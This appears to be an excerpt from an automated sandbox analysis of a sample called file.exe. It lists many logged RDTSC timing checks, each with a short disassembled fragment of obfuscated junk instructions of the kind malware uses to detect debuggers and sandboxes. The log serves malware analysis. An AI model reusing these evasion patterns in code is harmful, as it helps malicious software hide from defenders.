Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BF94F second address: 13BF985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, 04F42100h 0x0000000e lea eax, dword ptr [ebp+124804AAh] 0x00000014 xor ecx, 700C50C4h 0x0000001a nop 0x0000001b pushad 0x0000001c jmp 00007F65A450259Ah 0x00000021 ja 00007F65A4502598h 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BF985 second address: 13BF989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BF989 second address: 13BF98F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BF98F second address: 13A6750 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65A4C18FA2h 0x00000008 jmp 00007F65A4C18FA7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 xor edi, dword ptr [ebp+122D2CCCh] 0x00000017 lea eax, dword ptr [ebp+12480466h] 0x0000001d mov ecx, dword ptr [ebp+122D29D4h] 0x00000023 nop 0x00000024 jmp 00007F65A4C18FA6h 0x00000029 push eax 0x0000002a js 00007F65A4C18F9Ch 0x00000030 pushad 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 push esi 0x00000034 pop esi 0x00000035 popad 0x00000036 nop 0x00000037 jno 00007F65A4C18F96h 0x0000003d push ebx 0x0000003e mov edi, dword ptr [ebp+122DBA77h] 0x00000044 pop edx 0x00000045 call dword ptr [ebp+122D1A5Ah] 0x0000004b pushad 0x0000004c jl 00007F65A4C18F9Ah 0x00000052 pushad 0x00000053 popad 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 jl 00007F65A4C18F9Ch 0x0000005c jng 00007F65A4C18F96h 0x00000062 jne 00007F65A4C18FB3h 0x00000068 js 00007F65A4C18F9Ch 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1407652 second address: 1407658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1407658 second address: 140765C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140765C second address: 1407662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1407662 second address: 1407668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1407668 second address: 140767A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F65A450259Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140AC8F second address: 140AC93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140A502 second address: 140A525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F65A45025A2h 0x0000000c popad 0x0000000d jng 00007F65A45025BBh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140A525 second address: 140A52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140A52B second address: 140A531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140A847 second address: 140A851 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65A4C18FA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140A851 second address: 140A857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140E68B second address: 140E6A1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65A4C18FA1h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1412304 second address: 141230A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141230A second address: 141233C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA1h 0x00000007 jmp 00007F65A4C18F9Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65A4C18FA0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1411AD8 second address: 1411AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1411AE3 second address: 1411AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1411AE7 second address: 1411B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Fh 0x00000007 jp 00007F65A4502596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1411D4E second address: 1411D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1412060 second address: 1412084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F65A4502596h 0x0000000a pop edx 0x0000000b jnl 00007F65A450259Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65A450259Bh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1416F8C second address: 1416FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65A4C18FA6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1416FAB second address: 1416FC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141623B second address: 141624E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F65A4C18F9Ch 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14163AC second address: 14163C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A450259Dh 0x00000009 popad 0x0000000a pushad 0x0000000b jl 00007F65A4502596h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14163C7 second address: 14163E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18FA4h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14163E0 second address: 14163E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14163E6 second address: 14163FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18FA0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14163FA second address: 14163FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141651E second address: 141652C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416689 second address: 141668F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141668F second address: 14166A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18FA1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14166A4 second address: 14166A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14166A8 second address: 14166AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14167F9 second address: 141682A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F65A45025A6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F65A45025A3h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141682A second address: 1416852 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65A4C18F98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F65A4C18FA8h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B094 second address: 141B0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F65A45025A8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F65A45025A0h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B0B1 second address: 141B0B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B35C second address: 141B360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B360 second address: 141B364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B364 second address: 141B385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65A45025A7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B385 second address: 141B389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B389 second address: 141B3CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F65A4502596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F65A45025A4h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F65A45025AFh 0x0000001b jmp 00007F65A45025A7h 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B3CB second address: 141B3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B3D1 second address: 141B3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B547 second address: 141B54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B54E second address: 141B557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF3E2 second address: 13BF3F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65A4C18F9Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF3F5 second address: 13BF402 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF402 second address: 13BF44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F65A4C18F96h 0x0000000a popad 0x0000000b jc 00007F65A4C18F98h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 and edx, 495F67D6h 0x0000001b mov ecx, 715B80A2h 0x00000020 mov ebx, dword ptr [ebp+124804A5h] 0x00000026 mov dx, di 0x00000029 add eax, ebx 0x0000002b nop 0x0000002c jmp 00007F65A4C18F9Dh 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F65A4C18F9Dh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF44B second address: 13BF47E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and edi, 2A01B043h 0x00000010 push 00000004h 0x00000012 xor dword ptr [ebp+122D1873h], edx 0x00000018 mov dword ptr [ebp+122D358Ah], eax 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F65A450259Dh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF47E second address: 13BF483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF483 second address: 13BF489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF489 second address: 13BF496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423AE7 second address: 1423AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423AEB second address: 1423AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421AB3 second address: 1421AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421AB7 second address: 1421ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421C14 second address: 1421C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422063 second address: 142206D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142206D second address: 14220B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65A450259Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jmp 00007F65A45025A9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push esi 0x00000015 jmp 00007F65A45025A2h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14220B0 second address: 14220B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422388 second address: 142238E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142238E second address: 1422392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142265E second address: 1422684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F65A45025A3h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F65A4502596h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142295E second address: 1422967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422967 second address: 142296B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422EE5 second address: 1422EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422EED second address: 1422EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422EF3 second address: 1422EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422EF7 second address: 1422EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14234C6 second address: 14234D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F65A4C18F96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423769 second address: 142377F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65A450259Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007F65A4502596h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14283D7 second address: 1428405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA3h 0x00000007 jbe 00007F65A4C18F96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007F65A4C18F9Fh 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428405 second address: 142840A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14280F4 second address: 14280FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14280FC second address: 1428106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F65A4502596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428106 second address: 1428144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65A4C18FA7h 0x00000011 push edi 0x00000012 jbe 00007F65A4C18F96h 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428144 second address: 142814A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432653 second address: 1432672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432672 second address: 1432678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143278F second address: 1432793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432793 second address: 1432797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432797 second address: 14327B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a jl 00007F65A4C18F98h 0x00000010 pushad 0x00000011 jc 00007F65A4C18F96h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14330F0 second address: 143312F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65A45025A8h 0x00000008 jng 00007F65A4502596h 0x0000000e jmp 00007F65A450259Ch 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007F65A45025B1h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433559 second address: 143355D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143355D second address: 1433563 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433D21 second address: 1433D27 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433D27 second address: 1433D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F65A450259Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433D40 second address: 1433D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433D44 second address: 1433D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143448E second address: 1434496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1434496 second address: 143449E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143449E second address: 14344B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F65A4C18F9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14344B4 second address: 14344BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F65A4502596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432192 second address: 14321A6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65A4C18F96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F65A4C18F96h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14321A6 second address: 14321BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Dh 0x00000007 ja 00007F65A4502596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
